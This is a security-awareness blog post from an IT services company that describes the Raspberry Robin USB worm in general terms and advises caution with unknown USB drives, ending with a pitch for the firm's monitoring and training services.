raspberry robin

Utilizing storage devices, such as USB drives, has been known to spread malware from one device to another. Recent analyses found an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows-operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device will display an infected .LNK file. A msiexec process is then started through the command prompt. A .BAT file has two commands that can be executed. One command can manage various Windows features and the other command can configure Open Database Connectivity. The combination of the two will make the threat difficult to locate on the network as it remains hidden.

The Raspberry Robin infection process was found to escalate further where compromised QNAP NAS (Network-Attached Storage) devices are also affected. During this stage, the hacker is able to retrieve the victim’s user and device names, using HTTP requests, once the .LNK file is downloaded. From the infected QNAP device, the malware then utilizes a malicious DLL (Dynamic-Link Library) in order to gain access and take control over the entire system.

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, like most malware that are in its initial stages of development, there is not much known about Raspberry Robin. More research is required to determine its spreadability and the intention hackers may have when creating this worm. Although it is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

To keep yourself and your business safe from Raspberry Robin is to treat all USB devices with intense scrutiny. This includes eliminating inserting USB drives that do not belong to you or USB devices that might have been found lying around on the ground. It is important to remember that USB drives may not look suspicious from the outside but inside, it can be compromised. Always think twice before plugging in any unknown devices on your computers. 

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.

Recommended Posts

working remote
Cybersecurity Is Hard When Working Remote
a hand touching a screen with the word cyber security on it
Frequently Asked Questions About Cybersecurity
a person in a hooded jacket holding a laptop
5 of the Largest Cyberattacks of 2022

No comment yet, add your voice below!

Add a Comment

Your email address will not be published. Required fields are marked *